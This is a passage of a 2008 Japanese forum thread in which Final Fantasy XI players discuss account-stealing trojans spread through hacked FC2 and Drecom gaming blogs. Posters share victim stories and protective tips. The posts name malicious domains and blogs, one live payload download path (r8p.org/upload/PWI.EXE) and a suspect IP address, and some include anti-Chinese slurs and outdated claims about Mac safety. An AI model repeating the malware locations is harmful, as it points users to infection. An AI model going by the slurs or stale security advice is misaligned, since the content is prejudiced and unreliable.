174 :既にその名前は使われています:2008/03/24(月) 13:21:38.03 ID:HWQPHJQs
>>154
お前のかおもじが気に入らない
お前のかおもじが気に入らない
175 :既にその名前は使われています:2008/03/24(月) 13:23:13.70 ID:Q/ktx4QO
176 :既にその名前は使われています:2008/03/24(月) 13:49:30.88 ID:vtt50urT
dda3■net、hellh■netに続くfccja■comのトロイのスキャン。
各社への検体提出から23時間経過。
Kasperskyに続きAntiVirも撃墜するようになったものの、そこから変化なし。
ttp://www.virustotal.com/analisis/ae4b34f1f08f6dd6d93f3574b1fe6f04
各社への検体提出から23時間経過。
Kasperskyに続きAntiVirも撃墜するようになったものの、そこから変化なし。
ttp://www.virustotal.com/analisis/ae4b34f1f08f6dd6d93f3574b1fe6f04
177 :既にその名前は使われています:2008/03/24(月) 13:51:50.72 ID:47bjLYLG
ペコろぐソース見てきたけど、自分で見た限りでは変なスクリプトはなかった感じ。
3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。
まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは
気をつけないとだねぇ。
3/22に管理人様の書き込み記事で対処済みとあるのと、今現在は大丈夫そう。
まぁ、ただ再度やられているサイトさんあるから一度やられたサイトさん見るときは
気をつけないとだねぇ。
178 :既にその名前は使われています:2008/03/24(月) 13:55:10.96 ID:vtt50urT
ペコろぐ。 (罠撤去済み)
ヴァナモンblog (罠撤去済み)
FF11初心者の館 (ウイルス散布中)
ヴァナモンblog (罠撤去済み)
FF11初心者の館 (ウイルス散布中)
179 :既にその名前は使われています:2008/03/24(月) 14:09:41.96 ID:37tZuH3A
もうFC2はソースチェッカーでチェックしてからじゃないと
怖くて踏めないな...
怖くて踏めないな...
180 :既にその名前は使われています:2008/03/24(月) 14:11:42.90 ID:37tZuH3A
181 :既にその名前は使われています:2008/03/24(月) 14:31:36.43 ID:vTR+hCx8
注意age
182 :既にその名前は使われています:2008/03/24(月) 14:34:20.69 ID:Httpif6H
ぶっちゃけFC2側としてはたいして被害あるわけじゃないから
必死こく必要ないんだよなぁ
必死こく必要ないんだよなぁ
183 :既にその名前は使われています:2008/03/24(月) 14:45:51.90 ID:Ny3ZGjXA
とりあえず俺もHDD24時間稼働で1年経つし寿命ついでにOS再インスコしよう
そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……
そういえばHDD生産出荷段階で中華がウィルス仕込んでた事件もあったよなぁ……
184 :既にその名前は使われています:2008/03/24(月) 14:47:10.45 ID:WdMLKCJz
ほんっとにロクなもん混入しねえなあいつらwww
185 :既にその名前は使われています:2008/03/24(月) 14:53:21.20 ID:sI0/2XTk
「中国 混入」でググったら
予想を遥かに超えていた
予想を遥かに超えていた
186 :既にその名前は使われています:2008/03/24(月) 14:56:30.58 ID:Httpif6H
俺のIDもウィルススキャンしてくだしあ;
187 :既にその名前は使われています:2008/03/24(月) 15:02:06.20 ID:sV5MTkg6
俺の肛門もハックされそうだ!
188 :既にその名前は使われています:2008/03/24(月) 15:02:26.35 ID:sI0/2XTk
189 :既にその名前は使われています:2008/03/24(月) 15:03:52.97 ID:8jcNID1A
ドリコムに作られた罠サイトを連絡フォームで通報した
先ほど、閲覧制限を掛けたとメールで連絡が来た
http://ff11xicng●blog●drecom●jp/
http://ff11hdiw●blog●drecom●jp/
閲覧制限確認
先ほど、閲覧制限を掛けたとメールで連絡が来た
http://ff11xicng●blog●drecom●jp/
http://ff11hdiw●blog●drecom●jp/
閲覧制限確認
190 :既にその名前は使われています:2008/03/24(月) 15:15:39.10 ID:zZKH+Aj5
しかし10年前とかは輸出食品が劣悪ということはなかったんだよな
人増えすぎるとよくないな
人増えすぎるとよくないな
191 :既にその名前は使われています:2008/03/24(月) 15:31:47.67 ID:+jpHHFib
192 :既にその名前は使われています:2008/03/24(月) 15:38:27.74 ID:+jpHHFib
>>148
おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。
ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。
おれも最近2回垢ハックされた口だが、
(2回目はログイン中のハックだったので
ログイン合戦を繰り返して追い返してやったが)
1回目のときは30万ギルもため込んでいたギルも盗まれず、
ただ、闇杖だの光杖だのを競売に出せていただけだった。
あとそのメインキャラは削除されず、倉庫キャラを削除され、
その空いたスロットを使って別のサーバに新規キャラをつくられていた。
その新規キャラで試しにログインしてみると、
まるで普通のユーザーが普通のレベルあげなどをしていた形跡が
残っており、とても業者とは思えなかった。
ちなみに2回垢ハックされてから、
このスレにも書かれていた通り
・自動ログイン設定を解除する
・パスワードを変更する
・パスワードは毎回「スクリーンキーボード」を使って手入力
これを実行するようにしている。
それいらい垢ハックされていない。
193 :既にその名前は使われています:2008/03/24(月) 15:39:32.08 ID:RgZ1LaTX
194 :既にその名前は使われています:2008/03/24(月) 15:41:14.29 ID:+jpHHFib
>>162
おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。
おお、同士よw
俺の場合はログイン合戦を延々と20分くらい繰り返し、
相手があきらめてくれたようだ。
その後速効で
・自動ログイン設定を解除し
・パスワードを変更し
・以後、パスワードは毎回「スクリーンキーボード」でクリック入浴してログインしている
これで無問題。
195 :既にその名前は使われています:2008/03/24(月) 15:42:23.89 ID:Q/ktx4QO
>>193
相手にしなさんな(´д`)
相手にしなさんな(´д`)
196 :既にその名前は使われています:2008/03/24(月) 15:44:19.68 ID:+jpHHFib
>>193
理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。
日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。
理由は「マイナーだからウイルス作者は誰も相手にしてない」
というだけ。これはあまりにも有名なことなのでいちいち繰り返すな。
どういう理由であれ、
「M acは(ウイルスが存在しないので)感染しない」という事実は事実。
日本は防衛力が高いわけでは決してない。
むしろイラクの方は防衛力は上だろう。
だけど、被害が多いのはイラクの方。
それは、日本がテロに相手にされてないだけ。
197 :既にその名前は使われています:2008/03/24(月) 15:45:03.69 ID:Q/ktx4QO
198 :既にその名前は使われています:2008/03/24(月) 15:48:04.35 ID:gNFuY07B
烏の行水ならぬ鼠の行水・・・
【サンダー】【ショック】【気をつけてください。】
【サンダー】【ショック】【気をつけてください。】
199 :既にその名前は使われています:2008/03/24(月) 15:51:14.37 ID:vtt50urT
>>196
わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?
わざわざNG避けに「M ac」なんて
Mとacの間にスペース入れて煽るのは感心せんな。
ジョブズ復帰以降(iMac、OSX以降)、およびiPodヒット以降ユーザが増加し
おかげでウイルスも増えてることぐらいわかってるだろ?
200 :既にその名前は使われています:2008/03/24(月) 15:58:21.63 ID:xrdpbYwi
201 :既にその名前は使われています:2008/03/24(月) 16:00:56.88 ID:+jpHHFib
>>199
そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。
そうだね。Ma cユーザーが急増しているのに比例して
せっかくのMaacのクリーンな環境が崩れようとしているのは確かだね。
まぁしかしまだまだマイナーには変わりないんで、
実害が出るほどウイルスが増えることはないと思うよ。
202 :既にその名前は使われています:2008/03/24(月) 16:08:00.40 ID:UwqirNKw
なんつうか、防衛対策まともにとれないなら
PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい
PCでオンラインゲームやらないほうが良いのね 不安だからPSのほうにして正解だったぜい
203 :既にその名前は使われています:2008/03/24(月) 16:14:33.20 ID:+JYA+CIb
専ブラでID抽出するとテラワロスw
204 :既にその名前は使われています:2008/03/24(月) 16:14:57.46 ID:uo1cC9cX
パス変更した時に、盗まれるってのは、ある?
205 :既にその名前は使われています:2008/03/24(月) 16:18:28.67 ID:TvxgTMvM
>>204
すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに>>194の方法で変更するのが吉。
すでにキーロガーが仕込まれていたら、ありうる。
だが、現状で大流行している垢ハック用マルウェアの99%以上が
キーロガータイプではなく、パスワード保存ファイルを直接
盗んでいくタイプなので、垢ハックサイトを踏んだ可能性があるなら
直ちに>>194の方法で変更するのが吉。
206 :既にその名前は使われています:2008/03/24(月) 16:50:57.84 ID:vtt50urT
>>205
> 99%以上が キーロガータイプではなく、
>パスワード保存ファイルを直接 盗んでいくタイプ
断言するのは危険。Winsock2のLSPにくっついてパケットキャプチャする
(保存していようが手入力しようが関係無い)タイプはずいぶん前から投入されている
(リネージュ等のネトゲアカウントハックにも、それ以外にも広く使われている)。
ttp://www.mcafee.com/japan/security/virG2007.asp?v=Generic%20LSP
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-210538
ちなみにこのタイプは手動で該当ファイルを削除すると
通信不能になって涙目になったりする。
> 99%以上が キーロガータイプではなく、
>パスワード保存ファイルを直接 盗んでいくタイプ
断言するのは危険。Winsock2のLSPにくっついてパケットキャプチャする
(保存していようが手入力しようが関係無い)タイプはずいぶん前から投入されている
(リネージュ等のネトゲアカウントハックにも、それ以外にも広く使われている)。
ttp://www.mcafee.com/japan/security/virG2007.asp?v=Generic%20LSP
ttp://esupport.trendmicro.co.jp/supportjp/viewxml.do?ContentID=jp-210538
ちなみにこのタイプは手動で該当ファイルを削除すると
通信不能になって涙目になったりする。
207 :既にその名前は使われています:2008/03/24(月) 16:52:59.19 ID:vtt50urT
キーロガー型が現状少ないのはそのとおり。
余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に
マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで
先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた
(のでBOTNEWSなどでは「いまさら…」感があった)。
余談としてROではスクリーンキーボード(ATM等によくある配列バラバラのテンキー)に
マウスで鍵を入力する仕組みがあるんだが、実は東南アジア(フィリピンだったかな)のROで
先にこの方式を採用し、速攻で画面ごと動画キャプチャするステキなトロイも出ていた
(のでBOTNEWSなどでは「いまさら…」感があった)。
208 :既にその名前は使われています:2008/03/24(月) 17:09:06.90 ID:C2NTmBz4
夕べからこのスレ参考にして自分のPCにNoScriptとPeerGuardian導入
したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に
ならなくなってビビッタ。
どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は
Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が
起こるなんて事ってある?
一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に
できて、今Avastでスキャン中。
したんだけど、さっき親のPC起動したらWindowsのFirewallが有効に
ならなくなってビビッタ。
どっちのPCもOSはXP SP2でルータに無線LANで繋いでて、ウィルス対策は
Avast&Spybotなんだけど、自分のPC弄ったせいで親のPCに不具合が
起こるなんて事ってある?
一応、親のPCはシステムの復元で数日前に戻したらFirewallは有効に
できて、今Avastでスキャン中。
209 :既にその名前は使われています:2008/03/24(月) 17:21:09.00 ID:vtt50urT
原理的には可能だけど、まずないと思う。
210 :既にその名前は使われています:2008/03/24(月) 17:22:32.78 ID:Q/ktx4QO
>>208
妄想が豊かでうらやましいわw
妄想が豊かでうらやましいわw
211 :既にその名前は使われています:2008/03/24(月) 17:26:57.16 ID:C2NTmBz4
212 :既にその名前は使われています:2008/03/24(月) 17:34:35.33 ID:zErWARNN
UchinoLSの準はいじんwが
「垢ハック?あり得ねぇwww」
「される奴って馬鹿?w」
「FF専用PC用意すればいいのに馬鹿じゃねwww」
とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。
LS掲示板で騒いでた。
「垢ハック?あり得ねぇwww」
「される奴って馬鹿?w」
「FF専用PC用意すればいいのに馬鹿じゃねwww」
とか言ってた本人が垢ハックくらって所持金無くなってた上にキャラ削除までされてたんだとさ。
LS掲示板で騒いでた。
213 :既にその名前は使われています:2008/03/24(月) 17:35:58.73 ID:vtt50urT
FF専用PC用意してなかったんだね(´・ω・`)
214 :既にその名前は使われています:2008/03/24(月) 17:38:06.93 ID:zZKH+Aj5
215 :既にその名前は使われています:2008/03/24(月) 17:42:19.74 ID:T6Wahbt1
垢ハックされたかもwwww
216 :既にその名前は使われています:2008/03/24(月) 17:46:25.63 ID:KodraVfX
垢ファックされた><
217 :既にその名前は使われています:2008/03/24(月) 17:53:18.88 ID:76dNoHqz
PG2インスコしたらFFも弾くんだなワロタ
218 :既にその名前は使われています:2008/03/24(月) 18:00:45.95 ID:Fm9VlWLZ
パスをスクリーンキーボードで入力したいんだけど
PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)
PCでスクリーンキーボードってどうやって出すんだっけ(;´д`)
219 :既にその名前は使われています:2008/03/24(月) 18:06:10.11 ID:vtt50urT
アクセサリのユーザー補助。
アプリの追加で入れないと無いかも。
アプリの追加で入れないと無いかも。
220 :既にその名前は使われています:2008/03/24(月) 18:10:09.72 ID:HWQPHJQs
>>217
はじかねぇよw
はじかねぇよw
221 :既にその名前は使われています:2008/03/24(月) 18:10:44.01 ID:Fm9VlWLZ
そうなのか!
ありがとう入れてくるは
ありがとう入れてくるは
222 :既にその名前は使われています:2008/03/24(月) 18:22:05.69 ID:76dNoHqz
223 :既にその名前は使われています:2008/03/24(月) 18:23:48.81 ID:mvpeqCeH
先日ハックされました、ノートン最新状態で無反応。
FF立ち上げたらインストールディスクを入れろと指示されFF開始できない
CDもってきたら普通に起動、しかしIDやパスを再入力する状態
そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww
セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・
GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話
やっとGM来てキャラを即停止してもらい本人確認後キャラ返還
ギルや高額アイテムは一切無しの状態でした
ウイルスソフトで再サーチ+FFをインスコ
だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断
HDを初期化し終結・・・・・・
GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、
ということは何も戻ってこないということじゃんwwwwwww
不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・
GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!
FF立ち上げたらインストールディスクを入れろと指示されFF開始できない
CDもってきたら普通に起動、しかしIDやパスを再入力する状態
そのままオンしてプレーし、翌朝またオンしようとしたら「パスが違います」wwwwwww
セカンド垢でオンしてサーチしたらハックされたキャラがジュノでうろちょろ・・・
GM呼んだけど30件待ち、コールセンターは朝早くて留守番電話
やっとGM来てキャラを即停止してもらい本人確認後キャラ返還
ギルや高額アイテムは一切無しの状態でした
ウイルスソフトで再サーチ+FFをインスコ
だけどオンするときにパスが消えていてまたCD入れろとなるのでウイルス削除不可と判断
HDを初期化し終結・・・・・・
GM曰く、半年くらいたったら垢ハックしたときに店売りされている物だけは返還するとのこと、
ということは何も戻ってこないということじゃんwwwwwww
不審なサイトやDLをしていないので、スパイウエァ混入の経路不明・・・・・・
GMに警察に届けろと言われたが、ギルもアイテムも戻らないのに意味ねぇ!!
224 :既にその名前は使われています:2008/03/24(月) 18:27:19.70 ID:lMomuAcj
225 :既にその名前は使われています:2008/03/24(月) 18:29:27.04 ID:8bfKIyLi
いい加減、公式のトップページで注意喚起を促す文章載せろよクソエニ
226 :既にその名前は使われています:2008/03/24(月) 18:30:54.19 ID:zZKH+Aj5
227 :既にその名前は使われています:2008/03/24(月) 18:31:17.01 ID:+JYA+CIb
>>222
PG2 FFXI でぐぐれば幸せになれる
PG2 FFXI でぐぐれば幸せになれる
228 :既にその名前は使われています:2008/03/24(月) 18:31:35.14 ID:f8U+hHlG
インしたら数行垂れ流すだけでも随分違うのにな
229 :既にその名前は使われています:2008/03/24(月) 18:34:27.81 ID:uo1cC9cX
もう誰かが、シャウトで、伝えるて問題を大きくするしかないな
230 :既にその名前は使われています:2008/03/24(月) 18:45:05.56 ID:lMomuAcj
231 :既にその名前は使われています:2008/03/24(月) 18:51:29.02 ID:ExAbIYmH
http://www.playonline.com/ff11/polnews/news12892.shtml
何か対応してくれる!? わけねーかw
何か対応してくれる!? わけねーかw
232 :既にその名前は使われています:2008/03/24(月) 19:02:15.55 ID:vQXYTLxz
>>223
ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。
ギルやアイテムが戻らなくても業者に鉄槌が落ちるかもしれない。
233 :既にその名前は使われています:2008/03/24(月) 19:04:25.59 ID:QdOH9ZPy
韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
234 :既にその名前は使われています:2008/03/24(月) 19:05:52.25 ID:zZKH+Aj5
235 :既にその名前は使われています:2008/03/24(月) 19:06:50.04 ID:zZKH+Aj5
236 :既にその名前は使われています:2008/03/24(月) 19:08:48.26 ID:+JYA+CIb
とりあえず、書き込んだあとに自分のID確認してみような
237 :既にその名前は使われています:2008/03/24(月) 19:16:24.20 ID:0G3UgKbW
Temporary Internet Filesの中の1つのファイルが 感染: Trojan-Downloader.VBS.Small.gn
と診断されました
マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが
最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました
そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが
このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません
中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです
ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか?
削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?
と診断されました
マカフィーがを使っていて、このファイルを踏んだ時反応して遮断されてはいたのですが
最近の騒ぎで、初めてカスペオンラインスキャンを行ったところ、引っかかりました
そのままカスペの試用版で消すには、今使ってるセキュリティソフトを消せと言われたので実行しませんでしたが
このファイルを踏んでから何度も行ってるマカフィーのチェックでは引っかかりません
中身は、ハックスレ11で報告されている r8p.org/upload/PWI.EXE をDLするスクリプトです
ほかに検出されたものはないので、危険性のあるファイルだけど実効はされてないということでしょうか?
削除は、このテンポラリファイルを削除するだけで大丈夫でしょうか?
238 :既にその名前は使われています:2008/03/24(月) 19:20:12.37 ID:4CoULjpF
POLに適当なIDとパス入れた状態でアカハックさせればよくね
239 :既にその名前は使われています:2008/03/24(月) 19:21:31.66 ID:8jcNID1A
>>233
Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe
Windows XPを使ってるとして、
%SytemRoot%\system32(例:C:\WINDOWS\system32)に tracerts.exe が
あったらトロイに感染してる
Windows標準コマンドのtracert.exeやtracert6.exeじゃなくてtracert“s”.exe
240 :既にその名前は使われています:2008/03/24(月) 19:43:53.89 ID:QdOH9ZPy
241 :既にその名前は使われています:2008/03/24(月) 20:07:11.96 ID:Q/ktx4QO
242 :既にその名前は使われています:2008/03/24(月) 20:09:17.22 ID:AM88sWcX
マックでもアカハックされるの?マックにしようかなw
243 :既にその名前は使われています:2008/03/24(月) 20:14:02.64 ID:vznh5385
カスペルオンラインスキャナ走らせたのだが、結果のレポートのところで
感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて
ウィルス名のところに「ロックされています」て出てるのだが、これは何故?
感染オブジェクト名のところにずらーっとlogファイルやdatファイルが並んでて
ウィルス名のところに「ロックされています」て出てるのだが、これは何故?
244 :既にその名前は使われています:2008/03/24(月) 20:34:48.78 ID:+JYA+CIb
>>243
検査できませんでしたってログ
検査できませんでしたってログ
245 :既にその名前は使われています:2008/03/24(月) 20:37:12.64 ID:8jcNID1A
>>240
ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです
>>243
ほかのプログラムが使用中で開けないか削除できないから
ごめん、言葉足らずだった
tracerts.exeが見つからなくてもAdwareかなんかが仕込まれているのは
ほぼ間違いない。いろいろなオンラインスキャナで調べたほうがいいです
>>243
ほかのプログラムが使用中で開けないか削除できないから
246 :既にその名前は使われています:2008/03/24(月) 20:49:03.81 ID:nqpgFFzc
今月のパス抜きで可能性あるのは3月上旬あたりと中旬以降に該当サイトにアクセスした人間全員?
アクセス数から考えて、
アクセスしたけどん抜かれてない人が大多数だと思うんだけど、
その辺を分けてるものはなんだろ。
windows Update最新だと感染しないとかなのかな。
アクセス数から考えて、
アクセスしたけどん抜かれてない人が大多数だと思うんだけど、
その辺を分けてるものはなんだろ。
windows Update最新だと感染しないとかなのかな。
247 :既にその名前は使われています:2008/03/24(月) 20:54:25.34 ID:kh97SrbK
>>246
・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。
等々。
・単純にセキュリティー製品(アンチウイルス系ソフトなど)が頑張って感染or漏洩を防いだ。
・感染しているが、漏洩の物理的チャンスがない。
・漏洩しているが、犯行者の手元にある情報があまりにも大量のため、悪用にまでは至っていない。
等々。
248 :既にその名前は使われています:2008/03/24(月) 20:55:46.56 ID:lzZx8A86
>>233
>韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。
逆に>>233のPCから、58.227.193.190へアクセスしてるなら、>>245氏の言うとおり
何か仕込まれてるのかも。
>韓国の58.227.193.190というアドレスに定期的にアクセスするのですがハックされたのでしょうか?
58.227.193.190のアドレスから、一方的にアクセスされてるんだったら、
>>233の家のIPアドレスがが業者にばれてて、業者がセキュリティホールを探すために、
無差別でアクセスしてることもあると思う。
>>233のIPが動的IPなら、ルータ等を再起動するとかして、IPかえてみれば解決するかも。
逆に>>233のPCから、58.227.193.190へアクセスしてるなら、>>245氏の言うとおり
何か仕込まれてるのかも。
249 :既にその名前は使われています:2008/03/24(月) 20:58:51.08 ID:J6GiBSTn
250 :既にその名前は使われています:2008/03/24(月) 21:50:03.03 ID:47bjLYLG
定期保守上げを。
251 :既にその名前は使われています:2008/03/24(月) 21:53:37.87 ID:UcF3Od6M
NOD32でも駆除できる?
252 :既にその名前は使われています:2008/03/24(月) 22:12:42.15 ID:QdOH9ZPy
Backdoor.Out Break nk210-201-139-91.static.apol.com.tw
感染しまくりのようです orz
感染しまくりのようです orz
253 :既にその名前は使われています:2008/03/24(月) 22:14:23.47 ID:CHzqP0my
バハ鯖でまた垢ハック
254 :既にその名前は使われています:2008/03/24(月) 22:15:19.89 ID:hdKDzAOI
255 :既にその名前は使われています:2008/03/24(月) 22:28:28.26 ID:7DTVIQ6X
ネ実にわざわざ報告に来る人なんて被害者の100分の1くらいだろうし、実害数を考えると恐ろしい
さて本営は何時までだんまりを決め込むのやら
さて本営は何時までだんまりを決め込むのやら
256 :既にその名前は使われています:2008/03/24(月) 22:31:14.88 ID:0jHdHBFL
業者対策へ本腰入れるのに3,4年掛かってるからな
1年後に対策したとしても、早いくらいだなw
1年後に対策したとしても、早いくらいだなw
257 :既にその名前は使われています:2008/03/24(月) 22:32:35.55 ID:tcfmCYoK
>>253
えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー
事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?
んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?
えぇ〜、人が多いとは言えそう立て続けに・・・しかも
土日狙いじゃないとか嘘クセー
事実なら相当数のID&Passのストックがあって嬉しい悲鳴を上げながら
サポセン閉まっているであろう時間内に捌こうという事だろうか?
んで時間的に日本の垢狙い撃ちッぽいな。
英語堪能で国際電話もいとわないならば海外サポセン試した方が良いかも?
スクエニの海外サポセンならチャット対応とかもあるかな?
258 :既にその名前は使われています:2008/03/24(月) 22:37:56.69 ID:pye7laJB
パスをスクリーンキーボードで打ち込むようにしたんだが、
流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?
流石に動画キャプチャーするようなスーパートロイはでてない・・・よな?
259 :既にその名前は使われています:2008/03/24(月) 22:39:07.41 ID:0U03pW8G
>>258
今のところFF11の垢ハックのためのものは出てない、と思いたい
今のところFF11の垢ハックのためのものは出てない、と思いたい
260 :既にその名前は使われています:2008/03/24(月) 22:40:19.27 ID:pye7laJB
他のはあるのかよwwwwwww
恐ろしいな マジで
恐ろしいな マジで
261 :既にその名前は使われています:2008/03/24(月) 22:40:43.61 ID:GcBBAZhm
原因究明・セキュリティの強化を
ttp://blog.fc2.com/forum/viewtopic.php?t=20829
FC2ユーザーフォーラムにスレが立った。
実際に被害に遭ったブログ主はここで経緯と状況を説明してもらえないだろうか。
第三者が伝聞で書き込みしていても意味が無い。
ttp://blog.fc2.com/forum/viewtopic.php?t=20829
FC2ユーザーフォーラムにスレが立った。
実際に被害に遭ったブログ主はここで経緯と状況を説明してもらえないだろうか。
第三者が伝聞で書き込みしていても意味が無い。
262 :既にその名前は使われています:2008/03/24(月) 22:59:32.30 ID:vtt50urT
>>251
無理。AntiVirならできる
無理。AntiVirならできる
263 :既にその名前は使われています:2008/03/24(月) 23:05:25.00 ID:tcfmCYoK
>>261
fc2ってだけでアクセスしたくないなw
fc2ってだけでアクセスしたくないなw
264 :既にその名前は使われています:2008/03/24(月) 23:19:20.01 ID:Yd7XwcSP
ノートン2008+PeerGuardian2で韓国やら香港やら厨国蹴って
ZoneAlarmでファイアウォールを有効にして
パスは手打ちで9桁。ブラウザはSleipnir
WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない
これでも抜かれるサイト踏んだらまず抜かれます?
ていうかPeerGuardian2入れてみてビビッタ
別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・
ZoneAlarmでファイアウォールを有効にして
パスは手打ちで9桁。ブラウザはSleipnir
WindowsUpdateは最新で不都合多いと噂のIE7?だけ入れてない
これでも抜かれるサイト踏んだらまず抜かれます?
ていうかPeerGuardian2入れてみてビビッタ
別件だろうけど香港と韓国から分刻みで進入してきてたのね・・・・
265 :既にその名前は使われています:2008/03/24(月) 23:25:51.11 ID:qfZn+dai
>>263
冗談抜きで同意するは
冗談抜きで同意するは
266 :既にその名前は使われています:2008/03/24(月) 23:32:02.13 ID:lzZx8A86
>>252
これかな。
http://spywaredetector.net/spyware_encyclopedia/Backdoor.Out%20Break.htm
残念だけど、バックドア仕込まれてたっぽいね。
FFと関係あるのかは不明だけど、>>249のスパム業者だったら、
スパムメールの送信端末とかにされてたのかも。
駆除するか、心配なら駆除した後でOSクリーンインストールして
おいたほうが安全だと思う。
これかな。
http://spywaredetector.net/spyware_encyclopedia/Backdoor.Out%20Break.htm
残念だけど、バックドア仕込まれてたっぽいね。
FFと関係あるのかは不明だけど、>>249のスパム業者だったら、
スパムメールの送信端末とかにされてたのかも。
駆除するか、心配なら駆除した後でOSクリーンインストールして
おいたほうが安全だと思う。
267 :既にその名前は使われています:2008/03/24(月) 23:38:25.28 ID:vtt50urT
>>261
そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。
そこ見たらLineage Database(というFC2ブログ)も食われたらしいね。
268 :既にその名前は使われています:2008/03/24(月) 23:40:22.20 ID:ApBIgGA/
仕事から帰ってきたらPOLパスワード変えられてました。
フレにGM呼んでもらって待ってるとこですが、
自キャラがどうやらログインしてる模様です。
なんだかなぁ・・・。
フレにGM呼んでもらって待ってるとこですが、
自キャラがどうやらログインしてる模様です。
なんだかなぁ・・・。
269 :既にその名前は使われています:2008/03/24(月) 23:42:00.79 ID:We8pVkNe
270 :既にその名前は使われています:2008/03/24(月) 23:44:12.74 ID:+KW5+qyc
271 :既にその名前は使われています:2008/03/24(月) 23:44:47.78 ID:T6Wahbt1
272 :既にその名前は使われています:2008/03/24(月) 23:44:52.61 ID:tcfmCYoK
スクエニ様〜おねげぇデスじゃ〜24時間窓口作ってくだされぇ〜〜ッて感じだよね
273 :268:2008/03/24(月) 23:46:54.93 ID:ApBIgGA/
>>269
80件以上待ちだということです。
倉庫めぐりまでされてるとか。
なんというやるせなさw
フレが倉庫にtellで「GM呼んだ」的なことを言ったら
「Please」とかえってきたそうな。
返事するんだな・・・・
80件以上待ちだということです。
